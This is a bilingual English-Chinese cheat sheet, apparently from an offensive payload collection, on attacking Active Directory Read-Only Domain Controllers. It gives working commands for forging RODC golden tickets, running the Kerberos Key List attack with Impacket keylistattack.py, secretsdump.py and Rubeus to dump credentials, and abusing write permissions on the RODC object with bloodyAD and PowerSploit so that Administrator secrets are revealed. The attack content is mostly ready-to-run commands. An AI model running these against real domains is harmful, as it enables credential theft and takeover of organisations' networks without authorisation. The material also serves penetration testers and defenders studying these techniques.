Active Directory – Read Only Domain Controller

RODCs are an alternative for Domain Controllers in less secure physical locations – Contains a filtered copy of AD (LAPS and Bitlocker keys are excluded) – Any user or group specified in the managedBy attribute of an RODC has local admin access to the RODC server
RODC 是物理位置安全性较低的域控制器的替代方法 – 包含 AD 的筛选副本（不包括 LAPS 和 Bitlocker 密钥） – 在 RODC 的 managedBy 属性中指定的任何用户或组都具有对 RODC 服务器的本地管理员访问权限

RODC Golden Ticket RODC金票

• You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals listed in the RODC’s msDS-RevealOnDemandGroup attribute and not in the RODC’s msDS-NeverRevealGroup attribute
  可以伪造 RODC 黄金票证，并将其提供给可写域控制器，仅适用于 RODC 的 msDS-RevealOnDemandGroup 属性中列出的主体，而不是 RODC 的 msDS-NeverRevealGroup 属性中列出的主体

RODC Key List Attack
RODC 密钥列表攻击

Requirements: 要求：

• Impacket PR #1210 – The Kerberos Key List Attack
  Impacket PR #1210 – Kerberos 密钥列表攻击
• krbtgt credentials of the RODC (-rodcKey)
  RODC 的 krbtgt 凭据 （-rodcKey）
• ID of the krbtgt account of the RODC (-rodcNo)
  RODC 的 krbtgt 帐户的 ID （-rodcNo）

Exploit: 利用：

• using Impacket  使用 Impacket

  # keylistattack.py using SAMR user enumeration without filtering (-full flag)
  keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
  
  # keylistattack.py defining a target username (-t flag)
  keylistattack.py -kdc server.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST
  
  # secretsdump.py using the Kerberos Key List Attack option (-use-keylist)
  secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
  

• Using Rubeus  使用 Rubeus

  Rubeus.exe golden /rodcNumber:25078 /aes256:eacd894dd0d934e84de35860ce06a4fac591ca63c228ddc1c7a0ebbfa64c7545 /user:admin /id:1136 /domain:lab.local /sid:S-1-5-21-1437000690-1664695696-1586295871
  Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/lab.local /dc:dc1.lab.local /ticket:doIFgzCC[...]wIBBxhYnM=
  

RODC Computer Object RODC 计算机对象

When you have one the following permissions to the RODC computer object: GenericWrite, GenericAll, WriteDacl, Owns, WriteOwner, WriteProperty.
当您对 RODC 计算机对象具有以下权限之一时：GenericWrite、GenericAll、WriteDacl、Owns、WriteOwner、WriteProperty。

• Add a domain admin account to the RODC’s msDS-RevealOnDemandGroup attribute
  将域管理员帐户添加到 RODC 的 msDS-RevealOnDemandGroup 属性
• Windows/Linux:  Windows/Linux操作系统：

  # Get original msDS-RevealOnDemandGroup values 
  bloodyAD --host 10.10.10.10 -d domain.local -u username -p pass123 get object 'RODC$' --attr msDS-RevealOnDemandGroup
  distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
  msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local
  # Add the previous value plus the admin account
  bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 set object 'RODC$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
  

• Windows only:  仅限 Windows：

  PowerSploit> Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}
  

References 引用

• Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory – Sean Metcalf
  攻击只读域控制器 （RODC） 以拥有 Active Directory – 肖恩·梅特卡夫
• At the Edge of Tier Zero: The Curious Case of the RODC – Elad Shamir
  在零级的边缘：RODC 的奇特案例 – Elad Shamir
• The Kerberos Key List Attack: The return of the Read Only Domain Controllers – Leandro Cuozzo
  Kerberos 密钥列表攻击：只读域控制器的回归 – Leandro Cuozzo